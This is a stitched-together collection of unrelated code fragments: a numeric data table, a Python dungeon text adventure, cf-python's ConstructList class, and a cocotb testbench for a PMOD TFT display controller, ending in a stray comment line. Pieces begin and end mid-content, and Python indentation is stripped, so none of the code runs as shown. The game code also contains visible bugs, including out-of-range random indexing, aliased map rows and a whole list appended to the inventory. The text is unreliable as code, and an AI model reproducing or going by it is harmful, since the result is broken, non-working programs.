2 130 8 0 4 101 93 125 69 129 121 73 65
1 131 2 1 130 128
1 1 2 1 97 131
2 132 8 0 3 105 97 129 73 133 125 77 69
2 134 8 0 4 105 97 129 73 133 125 77 69
1 135 2 1 134 132
1 1 2 1 101 135
2 136 5 0 3 101 133 77 129 73
2 137 5 0 4 101 133 77 129 73
1 138 2 1 137 136
1 1 2 1 105 138
2 139 3 0 3 105 133 77
1 140 1 0 139
1 1 1 0 140
2 141 3 0 3 114 142 86
1 143 1 0 141
1 1 1 0 143
2 144 5 0 3 117 142 86 145 89
2 146 5 0 4 117 142 86 145 89
1 147 2 1 146 144
1 1 2 1 114 147
2 148 8 0 3 121 114 145 89 149 142 93 86
2 150 8 0 4 121 114 145 89 149 142 93 86
1 151 2 1 150 148
1 1 2 1 117 151
2 152 8 0 3 125 117 149 93 153 145 97 89
2 154 8 0 4 125 117 149 93 153 145 97 89
1 155 2 1 154 152
1 1 2 1 121 155
2 156 8 0 3 129 121 153 97 157 149 101 93
2 158 8 0 4 129 121 153 97 157 149 101 93
1 159 2 1 158 156
1 1 2 1 125 159
2 160 8 0 3 133 125 157 101 161 153 105 97
2 162 8 0 4 133 125 157 101 161 153 105 97
1 163 2 1 162 160
1 1 2 1 129 163
2 164 5 0 3 129 161 105 157 101
2 165 5 0 4 129 161 105 157 101
1 166 2 1 165 164
1 1 2 1 133 166
2 167 3 0 3 133 161 105
1 168 1 0 167
1 1 1 0 168
2 169 3 0 3 145 114 117
1 170 1 0 169
1 1 2 1 142 170
2 171 5 0 3 149 142 117 121 114
2 172 5 0 4 149 142 117 121 114
1 173 2 1 172 171
1 1 2 1 145 173
2 174 5 0 3 153 145 121 125 117
2 175 5 0 4 153 145 121 125 117
1 176 2 1 175 174
1 1 2 1 149 176
2 177 5 0 3 157 149 125 129 121
2 178 5 0 4 157 149 125 129 121
1 179 2 1 178 177
1 1 2 1 153 179
2 180 5 0 3 161 153 129 133 125
2 181 5 0 4 161 153 129 133 125
1 182 2 1 181 180
1 1 2 1 157 182
2 | |
<reponame>OJHFire/Uni-text-game
#importing all the other libraries and classes
from ItemsClass import *
from EnemiesClass import *
from time import sleep
from os import system
from random import randint
# defining some global variables
health = 0
failed = False
inventory = []
finished = False
enemy_counter = 0
search_map = []
x = 0
y = 0
current_room = "None"
width = 6
height = 6
#a function that generates a map to be used to check if a room has been searched
def generate_search_map():
#Makes the search_map array global since i define it in here
global search_map
#emptys the search_map array and the temp array
search_map = []
temp_array = []
#for loop that makes an array with the amount of empty trings that the person said the map should be wide
for i in range(width):
temp_array.append("")
#for loop that adds the temp_array to the search_map
for i in range(height):
search_map.append(temp_array)
def slow_print(string):
for char in string + "\n":
print(char, end="", flush=True)
sleep(0.000002)
difficulty = "Normal"
rooms = ["empty_room", "great_hall", "tomb", "corridor", "armoury", "kitchen", "torture_chamber", "dining_hall"]
#define weapons using Weapon class
fist = Weapon("Fist", 0, 1, 3, "None")
iron_broadsword = Weapon("Iron Broadsword", 1, 10, 1.5, "Iron")
iron_dagger = Weapon("Iron Dagger", 1, 5, 3, "Iron")
steel_broadsword = Weapon("Steel Broadsword", 2, 20, 1.5, "Steel")
steel_dagger = Weapon("Steel Dagger", 2, 10, 3, "Steel")
iron_warhammer = Weapon("Iron Warhammer", 2, 50, 0.25, "Iron")
steel_warhammer = Weapon("Steel Warhammer", 3, 100, 0.25, "Steel")
iron_waraxe = Weapon("Iron War-Axe", 1, 7, 2, "Iron")
steel_waraxe = Weapon("Steel War-Axe", 2, 20, 2, "Steel")
iron_battleaxe = Weapon("Iron Battle Axe", 2, 30, 0.5, "Iron")
steel_battleaxe = Weapon("Steel Battle Axe", 3, 60, 0.5, "Steel")
weapons = [iron_broadsword, iron_battleaxe, iron_dagger, iron_warhammer, iron_waraxe, steel_warhammer, steel_battleaxe, steel_broadsword, steel_dagger, steel_waraxe]
weapons_list1 = []
weapons_list2 = []
weapons_list3 = []
for i in weapons:
if i.rarity == 1:
weapons_list1.append(i)
elif i.rarity == 2:
weapons_list2.append(i)
elif i.rarity == 3:
weapons_list3.append(i)
weapon = fist
#function to call the menu
def menu():
#print a welcome message to the user
slow_print("Hello, welcome to the dungeon!")
slow_print("I hope you enjoy your stay.\n")
#show a little graphic to spruce up the menu(I am not very good at ascii art so I chose something simple)
slow_print("""
/\\
/ \\
| |
| |
| |
| |
___| |___
|___ ___|
| |
|____| """)
#print out the players options
slow_print("""
Play
Scores
Quit
""")
#get an input from player to make a choice
choice = input("> ")
#if they chose an item off the menu then it sends them to the related function, else it reprints the menu with a message
if choice.lower() == "play":
system('cls')
play(difficulty)
elif choice.lower() == "scores":
system('cls')
scores()
elif choice.lower() == "quit":
system('cls')
slow_print("GoodBye!")
else:
system('cls')
slow_print("::INVALID COMMAND:: \n")
sleep(1)
menu()
def play(difficulty):
slow_print("Start")
slow_print("Difficulty: " + difficulty)
slow_print("Back")
choice = input("> ")
if choice.lower() == "start":
system('cls')
pre_game()
elif choice.lower() == "difficulty":
system('cls')
if difficulty == "Normal":
difficulty = "Hard"
elif difficulty == "Hard":
difficulty = "Easy"
else:
difficulty = "Normal"
play(difficulty)
elif choice.lower() == "back":
system('cls')
menu()
else:
system('cls')
slow_print("INVALID COMMAND")
play(difficulty)
def scores():
system('cls')
slow_print("Not finished yet")
input("> ")
system('cls')
menu()
def start(level, health, weapon):
while finished != True or failed != True:
system('cls')
observe()
nesw = check_directions()
slow_print("The available directions are: " + nesw)
command()
health += 1
get_location(level)
is_exit()
def pre_game():
global current_room
global weapon
global health
global width
global height
global enemy_counter
valid = False
while valid != True:
system('cls')
slow_print("Please input the map width")
width = int(input("> "))
system('cls')
slow_print("Please input the map height")
height = int(input("> "))
if width >= 2 and height >= 2:
valid = True
if difficulty == "Easy":
enemy_counter = 10
elif difficulty == "Normal":
enemy_counter = 5
elif difficulty == "Hard":
enemy_counter = 2
generate_search_map()
new_map = create_map()
current_room = level[0][0]
populate_map(new_map)
get_location(level)
health = 100
start(level, health, weapon)
def create_map():
global level
level = []
for i in range(height):
temp = []
for j in range(width):
temp.append("")
level.append(temp)
return level
def populate_map(level):
level[0][0] = "entrance"
level[width - 1][height - 1] = "exit"
num1 = 0
num2 = 0
for i in range(width):
num2 = 0
for i in range(height):
num = randint(0, len(rooms) - 1)
room = rooms[num]
if level[num1][num2] == "":
level[num1][num2] = room
num2 += 1
num1 += 1
def command():
user_inp = ""
while user_inp == "":
user_inp = input("> ").upper()
command = ""
parameter = ""
space = False
for i in user_inp:
if i == " ":
space = True
continue
if space == False:
command = command + i
else:
parameter = parameter + i
if command == "MOVE":
move(parameter)
elif command in ["SEARCH", "LOOK"]:
search()
elif command in ["OBSERVE","DESC", "DESCRIPTION"]:
observe()
elif command in ["DIRECTIONS", "DIR"]:
nesw = check_directions()
print("The available directions are: " + nesw)
elif command == "EQUIP":
equip()
elif command == "INVENTORY":
view_inv()
def move(parameter):
global y
global x
if parameter in ["NORTH", "SOUTH", "EAST", "WEST"]:
if parameter == "NORTH":
if y != 0:
y -= 1
else:
slow_print("You can not go that way")
elif parameter == "SOUTH":
if y != height - 1:
y += 1
else:
slow_print("You can not go that way")
elif parameter == "EAST":
if x != width - 1:
x += 1
else:
slow_print("You can not go that way")
elif parameter == "WEST":
if x != 0:
x -= 1
else:
slow_print("You can not go that way")
else:
system('cls')
slow_print("MOVE command does not have the parameter " + parameter)
get_location(level)
combat_counter()
def view_inv():
system('cls')
slow_print("Inventory:")
for i in inventory:
slow_print(i.name)
input("> ")
def search():
system('cls')
global x
global y
num = randint(0, 10)
if search_map[x][y] == "":
search_map[x][y] = "S"
if level[x][y] == "entrance":
inventory.append(iron_broadsword)
slow_print("You found an iron broadsword!")
if num > 5:
if level[x][y] == "corridor":
slow_print("You can't find anything in the corridor")
elif level[x][y] in ["kitchen", "empty_room", "dining_hall"]:
num = randint(0, len(weapons_list1))
if weapons_list1[num] in inventory:
slow_print("You didn't find anything")
else:
inventory.append(weapons_list1[num])
slow_print("You found a " + weapons_list1[num].name)
elif level[x][y] in ["great_hall", "tomb"]:
num = randint(0, len(weapons_list2))
if weapons_list2[num] in inventory:
slow_print("You didn't find anything")
else:
inventory.append(weapons_list2)
slow_print("You found a " + weapons_list2[num].name)
else:
num = randint(0, len(weapons_list3))
if weapons_list3[num] in inventory:
slow_print("You didn't find anything")
else:
inventory.append(weapons_list3[num])
slow_print("You found a " + weapons_list3[num].name)
if num <= 5 and level[x][y] != "entrance":
slow_print("You didnt find anything")
else:
slow_print("I don't think I'll find anything else here")
input("> ")
def observe():
if current_room == "corridor":
system('cls')
slow_print("Corridor: \n")
slow_print("You find yourself in a dark wet corridor, there is just enough light from the torches held\non the wall to make it through without tripping")
elif current_room == "armoury":
system('cls')
slow_print("Armoury: \n")
slow_print("You found yourself in an armoury.\nHowever its really old so there isn't much left, maybe you can find a new weapon if you search the room.")
elif current_room == "kitchen":
system('cls')
slow_print("Kitchen: \n")
slow_print("You found yourself in a kitchen")
elif current_room == "entrance":
system('cls')
slow_print("Entrance: \n")
slow_print("You awake in a brightly lit room, you need to get out...")
elif current_room == "exit":
system('cls')
slow_print("You found the exit!")
elif current_room == "great_hall":
system('cls')
slow_print("Great Hall: \n")
slow_print("You look around to see you're in some sort of hall, probably used for \nspeeches and such when this place was used.")
elif current_room == "tomb":
system('cls')
slow_print("Tomb: \n")
slow_print("It seems to be a tomb with a coffin in the middle, its sealed tight though,\nso don't expect anything to popout.")
elif current_room == "torture_chamber":
system('cls')
slow_print("Torture Chamber: \n")
slow_print("The smell of blood is overpowering in this torture chamber")
elif current_room == "empty_room":
system('cls')
slow_print("Empty looking room: \n")
slow_print("Its a very bare looking room. There doesn't seem to be anything of interest.")
elif current_room == "dining_hall":
system('cls')
slow_print("Dining hall: \n")
slow_print("You walk into the cold dining room, its quite dark only lit by candles on the table.")
else:
slow_print("This room doesn't seem to have a definition. :(")
def equip():
global weapon
count = 1
system('cls')
slow_print("Weapon list")
for i in inventory:
slow_print(str(count) + ". " + i.name)
count += 1
slow_print("Please type the number of the weapon you would | |
<reponame>sadielbartholomew/cf-python<filename>cf/abstract/constructlist.py
import logging
import cfdm
from ..decorators import (
_deprecated_kwarg_check,
_manage_log_level_via_verbosity,
)
from ..functions import (
_DEPRECATION_ERROR,
_DEPRECATION_ERROR_DICT,
_DEPRECATION_ERROR_KWARGS,
)
from ..mixin_container import Container
logger = logging.getLogger(__name__)
class ConstructList(list, Container, cfdm.Container):
"""An ordered sequence of constructs.
The elements of the list are construct of the same type.
The list supports the python list-like operations (such as
indexing and methods like `!append`).
>>> fl = cf.{{class}}()
>>> len(fl)
0
>>> fl = cf.FieldList(f)
>>> len(fl)
1
>>> fl = cf.FieldList([f, g])
>>> len(fl)
2
>>> fl = cf.FieldList(cf.FieldList([f] * 3))
>>> len(fl)
3
>>> len(fl + fl)
6
Such methods provide functionality similar to that of a
:ref:`built-in list <python:tut-morelists>`. The main difference
is that when an element needs to be assesed for equality its
`!equals` method is used, rather than the ``==`` operator.
"""
def __init__(self, constructs=None):
"""**Initialization**
:Parameters:
constructs: (sequence of) constructs
Create a new list with these constructs.
"""
super(cfdm.Container, self).__init__()
if constructs is not None:
if getattr(constructs, "construct_type", None) is not None:
self.append(constructs)
else:
self.extend(constructs)
def __call__(self, *identities):
"""Alias for `cf.{{class}}.select_by_identity`."""
return self.select_by_identity(*identities)
def __deepcopy__(self, memo):
"""Called by the `copy.deepcopy` standard library function."""
return self.copy()
def __repr__(self):
"""Called by the `repr` built-in function.
x.__repr__() <==> repr(x)
"""
out = [repr(f) for f in self]
out = ",\n ".join(out)
return "[" + out + "]"
def __str__(self):
"""Called by the `str` built-in function.
x.__str__() <==> str(x)
"""
return repr(self)
def __docstring_method_exclusions__(self):
"""Return the names of methods to exclude from docstring
substitutions.
See `_docstring_method_exclusions` for details.
"""
return (
"append",
"extend",
"insert",
"pop",
"reverse",
"clear",
)
# ----------------------------------------------------------------
# Overloaded list methods
# ----------------------------------------------------------------
def __add__(self, x):
"""The binary arithmetic operation ``+``
f.__add__(x) <==> f + x
:Returns:
`{{class}}`
The concatenation of the list and another sequence.
**Examples:**
>>> h = f + g
>>> f += g
"""
return type(self)(list.__add__(self, x))
def __contains__(self, y):
"""Called to implement membership test operators.
x.__contains__(y) <==> y in x
{{List comparison}}
Note that ``x in fl`` is equivalent to
``any(f.equals(x) for f in fl)``.
"""
for f in self:
if f.equals(y):
return True
return False
def __mul__(self, n):
"""The binary arithmetic operation ``*``
f.__mul__(n) <==> f * n
:Returns:
`{{class}}`
The list added to itself *n* times.
**Examples:**
>>> h = f * 2
>>> f *= 2
"""
return type(self)(list.__mul__(self, n))
def __eq__(self, other):
"""The rich comparison operator ``==``
f.__eq__(x) <==> f == x
{{List comparison}}
Note that ``f == x`` is equivalent to ``not f.equals(x)``.
:Returns:
`bool`
"""
return self.equals(other)
def __getslice__(self, i, j):
"""Called to implement evaluation of f[i:j]
f.__getslice__(i, j) <==> f[i:j]
:Returns:
`{{class}}`
Slice of the list from *i* to *j*.
**Examples:**
>>> g = f[0:1]
>>> g = f[1:-4]
>>> g = f[:1]
>>> g = f[1:]
"""
return type(self)(list.__getslice__(self, i, j))
def __getitem__(self, index):
"""Called to implement evaluation of f[index]
f.__getitem_(index) <==> f[index]
:Returns:
If *index* is an integer then the corresponding list
element is returned. If *index* is a slice then a new
{{class}} is returned, which may be empty.
**Examples:**
>>> g = f[0]
>>> g = f[-1:-4:-1]
>>> g = f[2:2:2]
"""
out = list.__getitem__(self, index)
if isinstance(out, list):
return type(self)(out)
return out
def __ne__(self, other):
"""The rich comparison operator ``!=``
f.__ne__(x) <==> f != x
{{List comparison}}
Note that ``f != x`` is equivalent to ``not f.equals(x)``.
:Returns:
`bool`
"""
return not self.equals(other)
# ???
__len__ = list.__len__
__setitem__ = list.__setitem__
append = list.append
extend = list.extend
insert = list.insert
pop = list.pop
reverse = list.reverse
sort = list.sort
def close(self):
"""Close all files referenced by each construct in the list.
Note that a closed file will be automatically reopened if its
contents are subsequently required.
:Returns:
`None`
**Examples:**
>>> f.close()
"""
for f in self:
f.close()
def count(self, value):
"""Return the number of occurrences of value.
{{List comparison}}
Note that ``fl.count(value)`` is equivalent to
``sum(f.equals(value) for f in fl)``.
.. seealso:: `list.count`
**Examples:**
>>> f = cf.{{class}}([a, b, c, a])
>>> f.count(a)
2
>>> f.count(b)
1
>>> f.count('a string')
0
"""
return len([None for f in self if f.equals(value)])
def index(self, value, start=0, stop=None):
"""Return first index of value.
{{List comparison}}
An exception is raised if there is no such construct.
.. seealso:: `list.index`
"""
if start < 0:
start = len(self) + start
if stop is None:
stop = len(self)
elif stop < 0:
stop = len(self) + stop
for i, f in enumerate(self[start:stop]):
if f.equals(value):
return i + start
raise ValueError(
"{0!r} is not in {1}".format(value, self.__class__.__name__)
)
def remove(self, value):
"""Remove first occurrence of value.
{{List comparison}}
.. seealso:: `list.remove`
"""
for i, f in enumerate(self):
if f.equals(value):
del self[i]
return
raise ValueError(
"{0}.remove(x): x not in {0}".format(self.__class__.__name__)
)
def sort(self, key=None, reverse=False):
"""Sort of the list in place.
By default the list is sorted by the identities of its constructs,
but any sort criteria cna be specified with the *key* parameter.
The sort is stable.
.. versionadded:: 1.0.4
.. seealso:: `reverse`
:Parameters:
key: function, optional
Specify a function of one argument that is used to extract
a comparison key from each construct. By default the list
is sorted by construct identity, i.e. the default value of
*key* is ``lambda x: x.identity()``.
reverse: `bool`, optional
If set to `True`, then the list elements are sorted as if
each comparison were reversed.
:Returns:
`None`
"""
if key is None:
key = lambda f: f.identity()
return super().sort(key=key, reverse=reverse)
def copy(self, data=True):
"""Return a deep copy.
``f.copy()`` is equivalent to ``copy.deepcopy(f)``.
:Returns:
The deep copy.
**Examples:**
>>> g = f.copy()
>>> g is f
False
>>> f.equals(g)
True
>>> import copy
>>> h = copy.deepcopy(f)
>>> h is f
False
>>> f.equals(g)
True
"""
return type(self)([f.copy(data=data) for f in self])
@_deprecated_kwarg_check("traceback")
@_manage_log_level_via_verbosity
def equals(
self,
other,
rtol=None,
atol=None,
verbose=None,
ignore_data_type=False,
ignore_fill_value=False,
ignore_properties=(),
ignore_compression=False,
ignore_type=False,
ignore=(),
traceback=False,
unordered=False,
):
"""Whether two lists are the same.
Equality requires the two lists to have the same length and for
the construct elements to be equal pair-wise, using their
`!equals` methods.
Any type of object may be tested but, in general, equality is only
possible with another {{class}}, or a subclass of one. See the
*ignore_type* parameter.
Equality is between the constructs is strict by default. This
means that for two constructs to be considered equal they must
have corresponding metadata constructs and for each pair of
constructs:
* the same descriptive properties must be present, with the same
values and data types, and vector-valued properties must also
have same the size and be element-wise equal (see the
*ignore_properties* and *ignore_data_type* parameters), and
..
* if there are data arrays then they must have same shape and data
type, the same missing data mask, and be element-wise equal (see
the *ignore_data_type* parameter).
{{equals tolerance}}
If data arrays are compressed then the compression type and the
underlying compressed arrays must be the same, as well as the
arrays in their uncompressed forms. See the *ignore_compression*
parameter.
NetCDF elements, such as netCDF variable and dimension names, do
not constitute part of the CF data model and so are not checked on
any construct.
:Parameters:
other:
The object to compare for equality.
{{atol: number, optional}}
{{rtol: number, optional}}
{{ignore_fill_value: `bool`, optional}}
{{verbose: `int` or `str` or `None`, optional}}
ignore_properties: sequence of `str`, optional
The names of properties of the field construct (not the TODO
metadata constructs) to omit from the comparison. Note
that the "Conventions" property is always omitted by
default.
{{ignore_data_type: `bool`, optional}}
{{ignore_compression: `bool`, optional}}
unordered: `bool`, optional
If True then test that the lists contain equal
constructs in any relative order. By default, construct
order matters for the list comparison, such that each
construct is tested for equality with the construct
at the corresponding position in the list, pair-wise.
:Returns:
`bool`
Whether the two lists are equal.
**Examples:**
>>> fl.equals(fl)
True
>>> fl.equals(fl.copy())
| |
<gh_stars>10-100
import os
import sys
import cocotb
import logging
from cocotb.result import TestFailure
from cocotb.clock import Clock
import time
from array import array as Array
from cocotb.triggers import Timer, FallingEdge
from cocotb.drivers.amba import AXI4LiteMaster
from cocotb.drivers.amba import AXI4StreamMaster
CLK_PERIOD = 10
MODULE_PATH = os.path.join(os.path.dirname(__file__), os.pardir, "rtl")
MODULE_PATH = os.path.abspath(MODULE_PATH)
REG_CONTROL = 0 << 2
REG_STATUS = 1 << 2
REG_COMMAND_DATA = 2 << 2
REG_IMAGE_WIDTH = 3 << 2
REG_IMAGE_HEIGHT = 4 << 2
REG_IMAGE_SIZE = 5 << 2
REG_VERSION = 6 << 2
BIT_CONTROL_ENABLE = 0
BIT_CONTROL_ENABLE_INTERRUPT = 1
BIT_CONTROL_COMMAND_MODE = 2
BIT_CONTROL_BACKLIGHT_ENABLE = 3
BIT_CONTROL_RESET_DISPLAY = 4
BIT_CONTROL_COMMAND_WRITE = 5
BIT_CONTROL_COMMAND_READ = 6
BIT_CONTROL_COMMAND_PARAMETER = 7
BIT_CONTROL_WRITE_OVERRIDE = 8
BIT_CONTROL_CHIP_SELECT = 9
BIT_CONTROL_ENABLE_TEARING = 10
BIT_CONTROL_TP_RED = 12
BIT_CONTROL_TP_GREEN = 13
BIT_CONTROL_TP_BLUE = 14
MEM_ADR_RESET = 0x01
"""
Functions Required for checking out PMOD TFT
1. Write to the controller chip internal register
2. Read from the controller chip internall register
3. Video Frame Successfully is sent from the memory
to the controller chip
4. Video Frames are continually sent out
"""
WIDTH = 8
HEIGHT = 4
H_BLANK = 40
V_BLANK = 200
def setup_dut(dut):
cocotb.fork(Clock(dut.clk, CLK_PERIOD).start())
@cocotb.test(skip = True)
def write_to_controller(dut):
"""
Description:
Write a 16-bit valute to the controller
Test ID: 0
Expected Results:
A value is successfully written to the
the register of the controller.
This value should be readable from the test bench
"""
dut.rst <= 1
dut.i_fsync <= 1
dut.test_id <= 0
axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
setup_dut(dut)
yield Timer(CLK_PERIOD * 10)
dut.rst <= 0
dut.log.info("Ready")
yield Timer(CLK_PERIOD * 10)
dut.rst <= 1
setup_dut(dut)
yield Timer(CLK_PERIOD * 10)
dut.rst <= 0
dut.log.info("Ready")
yield Timer(CLK_PERIOD * 10)
control = 0x00
control |= 1 << BIT_CONTROL_CHIP_SELECT
control |= 1 << BIT_CONTROL_RESET_DISPLAY
control |= 1 << BIT_CONTROL_ENABLE
control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
#Reset the LCD
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_CHIP_SELECT)
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control |= 1 << BIT_CONTROL_CHIP_SELECT
##################################################
#Write a 0xAA55 to address 0xB8
#First set up the correct mode
control |= 1 << BIT_CONTROL_COMMAND_MODE
control &= ~ (1 << BIT_CONTROL_COMMAND_PARAMETER)
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
#Set The Address to write to
WRITE_ADDR = 0xB8
yield axim.write(REG_COMMAND_DATA, WRITE_ADDR)
yield Timer(CLK_PERIOD * 10)
#Write the command
control |= 1 << BIT_CONTROL_COMMAND_WRITE
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
#Write a parameter
WRITE_PARAMETER_1 = 0xAA # Arbitrary Data
WRITE_PARAMETER_2 = 0x55 # Arbitrary Data
# Write Parameter 1
yield axim.write(REG_COMMAND_DATA, WRITE_PARAMETER_1)
yield Timer(CLK_PERIOD * 10)
control |= 1 << BIT_CONTROL_COMMAND_PARAMETER
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
# Write Parameter 2
yield axim.write(REG_COMMAND_DATA, WRITE_PARAMETER_2)
yield Timer(CLK_PERIOD * 10)
control |= 1 << BIT_CONTROL_COMMAND_PARAMETER
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
#yield FallingEdge(dut.w_write_n)
#yield ReadOnly()
data = dut.r_write_parameter
value = (WRITE_PARAMETER_1 << 8) | WRITE_PARAMETER_2
if data != value:
raise TestFailure("Data written to register should have been: 0x02X, \
but is 0x%02X" % (data, value))
yield Timer(CLK_PERIOD * 100)
@cocotb.test(skip = True)
def read_from_controller(dut):
"""
Description:
Read a 16-bit value from the controller
Test ID: 1
Expected Results:
Receive a read request to address 0xB8
Should read back 0xAAAA
"""
dut.rst <= 1
dut.i_fsync <= 1
dut.test_id <= 1
axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
setup_dut(dut)
yield Timer(CLK_PERIOD * 10)
dut.rst <= 0
dut.log.info("Ready")
yield Timer(CLK_PERIOD * 10)
control = 0x00
control |= 1 << BIT_CONTROL_CHIP_SELECT
control |= 1 << BIT_CONTROL_RESET_DISPLAY
control |= 1 << BIT_CONTROL_ENABLE
control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
#Reset the LCD
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_CHIP_SELECT)
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control |= 1 << BIT_CONTROL_CHIP_SELECT
control |= 1 << BIT_CONTROL_COMMAND_MODE
# Set the address
READ_ADDR = 0xB8
control |= 1 << BIT_CONTROL_COMMAND_MODE
control &= ~ (1 << BIT_CONTROL_COMMAND_PARAMETER)
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
# Set address
yield axim.write(REG_COMMAND_DATA, READ_ADDR)
yield Timer(CLK_PERIOD * 10)
control |= 1 << BIT_CONTROL_COMMAND_WRITE
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_COMMAND_WRITE)
control |= 1 << BIT_CONTROL_COMMAND_PARAMETER
control |= 1 << BIT_CONTROL_COMMAND_READ
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
d1 = yield axim.read(REG_COMMAND_DATA)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
d2 = yield axim.read(REG_COMMAND_DATA)
d2 = int(d2)
d1 = int(d1 << 8)
data = d1 + d2
yield Timer(CLK_PERIOD * 10)
if data != 0xAAAA:
raise TestFailure("Data should have been 0x%04X but read: 0x%04X" % (0xAAAA, data))
#Set the pixel count
yield axim.write(REG_IMAGE_WIDTH, WIDTH)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_HEIGHT, HEIGHT)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_SIZE, WIDTH * HEIGHT)
yield Timer(CLK_PERIOD * 10)
@cocotb.test(skip = False)
def write_single_frame(dut):
"""
Description:
Send a single image to the controller
The signal format should be
Command: Set Memory Address
SEND Red, Blue, Green bytes
Repeat until full image is sent
It's important that the timing of the
sync strobes are good so that the FIFO doesn't
overfill
Test ID: 2
Expected Results:
Should read images out of the controller
*** NEED SOMETHING TO VERIFY THE IMAGES ARE CORRECT!!!***
"""
dut.rst <= 1
dut.i_fsync <= 0;
dut.test_id <= 2
axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
NUM_FRAMES = 1
HEIGHT = 4
WIDTH = 4
video = []
for y in range (HEIGHT):
line = []
for x in range (WIDTH):
if x == 0:
value = 0xFFFFFF
line.append(value)
elif x == (WIDTH) - 1:
value = 0xFFFFFF
line.append(value)
else:
value = x
line.append(value)
video.append(line)
setup_dut(dut)
yield Timer(CLK_PERIOD * 10)
dut.rst <= 0
dut.log.info("Ready")
yield Timer(CLK_PERIOD * 10)
control = 0x00
control |= 1 << BIT_CONTROL_CHIP_SELECT
control |= 1 << BIT_CONTROL_RESET_DISPLAY
control |= 1 << BIT_CONTROL_ENABLE
control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
#Reset the LCD
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
dut.i_fsync <= 1
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
#Set the pixel count
yield axim.write(REG_IMAGE_WIDTH, WIDTH)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_HEIGHT, HEIGHT)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_SIZE, WIDTH * HEIGHT)
yield Timer(CLK_PERIOD * 10)
dut.i_fsync <= 0
yield Timer(CLK_PERIOD * 10)
dut.i_fsync <= 1
#Enable image write
control = 0x00
control |= 1 << BIT_CONTROL_ENABLE
control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
#Write Video to the video controller
for line in video:
yield video_out.write(line)
yield Timer(CLK_PERIOD * 400)
@cocotb.test(skip = True)
def write_multiple_frames(dut):
"""
Description:
Send multiple images out of the controller
This test will verify that the full images
are successfully sent out and the process of restarting
the next image transfer does not lead to an error
Test ID: 3
Expected Results:
Should read images out of the controller
*** NEED SOMETHING TO VERIFY THE IMAGES ARE CORRECT!!!***
"""
dut.rst <= 1
dut.i_fsync <= 0;
dut.test_id <= 3
axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
NUM_FRAMES = 4
HEIGHT = 4
WIDTH = 4
video = []
for y in range (HEIGHT):
line = []
for x in range (WIDTH):
if x == 0:
value = 0xFFFFFF
line.append(value)
elif x == (WIDTH) - 1:
value = 0xFFFFFF
line.append(value)
else:
value = x
line.append(value)
video.append(line)
setup_dut(dut)
yield Timer(CLK_PERIOD * 10)
dut.rst <= 0
dut.log.info("Ready")
yield Timer(CLK_PERIOD * 10)
control = 0x00
control |= 1 << BIT_CONTROL_CHIP_SELECT
control |= 1 << BIT_CONTROL_RESET_DISPLAY
control |= 1 << BIT_CONTROL_ENABLE
control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
#Reset the LCD
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
dut.i_fsync <= 1
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
#Set the pixel count
yield axim.write(REG_IMAGE_WIDTH, WIDTH)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_HEIGHT, HEIGHT)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_SIZE, WIDTH * HEIGHT)
yield Timer(CLK_PERIOD * 10)
dut.i_fsync <= 0
yield Timer(CLK_PERIOD * 10)
dut.i_fsync <= 1
#Enable image write
control = | |
by pi/2 in the counterclockwise direction of the tangential vector
#will result in an outward normal vector.
